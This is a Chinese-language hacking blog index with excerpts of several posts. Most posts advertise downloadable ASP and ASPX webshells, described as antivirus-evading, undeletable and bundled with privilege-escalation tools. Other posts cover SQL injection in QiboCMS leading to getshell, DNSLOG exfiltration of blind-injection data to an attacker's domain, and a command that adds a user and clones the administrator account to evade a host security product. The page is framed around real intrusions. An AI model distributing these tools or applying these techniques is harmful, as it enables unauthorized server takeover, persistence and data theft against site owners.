首页作者admins
  • 不灭之魂2018改进版本-asp大马

    不灭之魂2018改进版本asp大马①在原版不灭之魂隐藏防删的基础上加上了炼魂大法,让不灭之魂永久不灭②继续集成了原版的所有提权功能③依旧霸气十足,炫酷十足,黑阔必备④去除原版后门,后门详情官网已披露,在此不必细说,原版后门(wz=ShellUrl收信)登录页面调用密码⑤修复了部分功能和去除无用功能,修复了登录页面爆密码还有参数爆密码漏洞登录界面如下:功能界面:下载地址:https://lanzou…
  • 土司搞基Asp大马

    土司搞基Asp大马,程序为C.S.G内部群某大牛发出,估计该位大牛也是T00ls内部的人员,界面十分精美解决了很多在火狐下排版错位的问题登录界面如下:功能界面:下载地址:https://lanzoui.com/i2b5cid 
  • 虚拟主机提权专用Webshell-asp大马

    虚拟主机提权专用Webshellcaidaome.com发布免杀Asp大马登录界面如下:功能界面: 集合超强各种虚拟主机提权0day!下载地址:https://lanzoui.com/i2b4z4b 
  • 超强提权免杀珍藏版-asp大马

    超强提权免杀珍藏版-asp大马,带超强提权登录界面如下:功能界面:集合超强各种提权0day!下载地址:https://lanzoui.com/i2b56xc
  • 免杀Aspx大马一枚、过常见WAF!

    今天在提权的时候发现的一个免杀的aspx大马,本身我用的是asp的免杀木马,由于asp马不能执行cmd,提权的时候我丢各类aspx的大马一上传就全部被隔离了,文件直接被隔离掉,生成xxx.aspx.log了,正在无助的时候,翻到有前辈的脚印! 打开一看,真是个大马。。下载地址:https://lanzoui.com/i2bssla
  • SQLmap中文参数说明

    一直在用sqlmap,但是真正用到的参数却没有几个,本文是详细的介绍了sqlmap工具中各个参数的使用说明,供以后学习参考使用。使用格式:sqlmap[参数]参数:-h,–help显示基本的帮助文档-hh显示高级帮助–version显示当前版本号-vVERBOSEVerbositylevel:0-6(default1)目标:至少要提供这些参数中的一个来定义参数:-dDIRE…
  • SQL注入奇巧淫技——利用DNSLOG获取看不到的信息

    对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban,所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。DNS在解析的时候会留下日志,咱们这个就是读取多级域名的解析日志,来获取信息简单来说就是把信息放在高级域名中,传递到自己这,然后读取日志,获取信息首先,你得有一个域名(like:abc.com),搭建好…
  • QiboCMS从SQL注入到getshell

    漏洞产生分析首先在do/.activate.php文件中找到发送激活序列的代码:提取重要信息:激活url:do/activate.php?job=activate&md5_id=$md5_id由激活的链接可以在此文件找到账号激活触发的流程:激活序列$md5_id在经过mymd5()函数的解密后生成$username和$password然后将$username代入了get_allInfo()函数,在…
  • 齐博cmsv7.0后台getshell

    0x01漏洞分析此漏洞比较鸡肋,需要后台权限。漏洞原理很简单,这里就简单分析一下。漏洞出现在:inc/class.inc.php中的GuideFidCache函数里/*导航条缓存*/functionGuideFidCache($table,$filename="guide_fid.php",$TruePath=0){global$db,$webdb,$pre;if($table=="{$pre}s…
  • MT过安全狗增加用户

    记一次入侵时发现可以增加用户,但是由于狗的存在,无法赋予管理员权限此时就进行类似使用注册表的复制超级管理员的操作使用MT的克隆功能,netusertesttest/addmt-cloneadministratortest 绕过安全狗,轻松增加用户